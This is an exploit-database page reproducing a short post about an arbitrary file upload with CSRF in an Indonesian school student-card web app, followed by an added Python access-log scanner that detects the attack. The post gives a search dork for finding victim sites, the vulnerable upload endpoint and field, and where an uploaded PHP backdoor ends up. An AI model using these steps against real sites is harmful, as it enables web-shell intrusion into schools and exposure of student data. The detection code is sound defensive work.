Aplikasi Kartu Pelajar Vulnerability arbitrary file upload with CSRF (Indonesian school)

Category: CWE-434
Price: Not specified
Severity: High
Risk: High
Exploitation Type: Remote
Date: 2021-01-17
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021010133

Below is a copy:

[+]Exploit title: Aplikasi Kartu Pelajar Vulnerability arbitrary file upload with CSRF (Indonesian school)
[+]Author : ./meicookies
[+]Dork : intext:Responsive image aplikasi kartu pelajar sch.id 

[+] Exploit: kartu.localcrot.sch.id/user/aksi/ubah_pelajar.php

  If there is an alert "Data Berhasil di Ubah", the fucking website is vulnerable to arbitrary file upload.

[+] CSRF :

  https://tools.xploitsecid.or.id/Exploit/CSRF
  postfile : gambar
  
[!] File Location :
  
  The files you upload will go to 
  kartu.localcrot.sch.id/img/your_backdoor.php

#hacktheplanet:D
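
For defenders, the request pattern described above (a POST to user/aksi/ubah_pelajar.php, then a request for a script under /img/) can be searched for in web server access logs. The following is an added example, not part of the original post: it assumes Combined Log Format, and the host name, IP addresses and file names in the sample lines are constructed.

```python
import re

# Combined Log Format: ip - - [time] "METHOD path PROTO" status size "referer" "ua"
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"'
)
UPLOAD_PATH = "/user/aksi/ubah_pelajar.php"  # endpoint named in the post
# Anything PHP-executable requested from the image upload directory
SCRIPT_IN_IMG = re.compile(r"^/img/[^?]*\.(php\d?|phtml|phar|pht)(\?|$)", re.I)

def scan(lines, site_host):
    """Return findings as (kind, client_ip, path) tuples, in log order."""
    findings = []
    uploaders = set()  # clients that have posted to the upload endpoint
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a Combined Log Format line
        ip, path, referer = m["ip"], m["path"], m["referer"]
        if m["method"] == "POST" and path.split("?")[0] == UPLOAD_PATH:
            uploaders.add(ip)
            # A foreign or missing Referer means the form was not served by the site
            ref_host = re.sub(r"^https?://", "", referer).split("/")[0]
            if ref_host != site_host:
                findings.append(("cross-site-upload-post", ip, path))
        elif SCRIPT_IN_IMG.match(path):
            kind = "script-in-img-after-upload" if ip in uploaders else "script-in-img"
            findings.append((kind, ip, path))
    return findings

# Constructed sample lines (host, addresses and file names are made up)
SAMPLE_LOG = [
    '198.51.100.7 - - [17/Jan/2021:10:00:01 +0700] "POST /user/aksi/ubah_pelajar.php HTTP/1.1" 200 512 "https://kartu.example.test/user/ubah.php" "Mozilla/5.0"',
    '203.0.113.9 - - [17/Jan/2021:10:05:12 +0700] "POST /user/aksi/ubah_pelajar.php HTTP/1.1" 200 498 "https://other.example.net/form.html" "Mozilla/5.0"',
    '203.0.113.9 - - [17/Jan/2021:10:05:20 +0700] "GET /img/sample.php HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [17/Jan/2021:10:06:00 +0700] "GET /img/siswa_01.jpg HTTP/1.1" 200 20480 "https://kartu.example.test/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, "kartu.example.test"):
        print(finding)
```

Any hit on a script under /img/ is worth investigating on its own, since that directory should only ever serve images.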
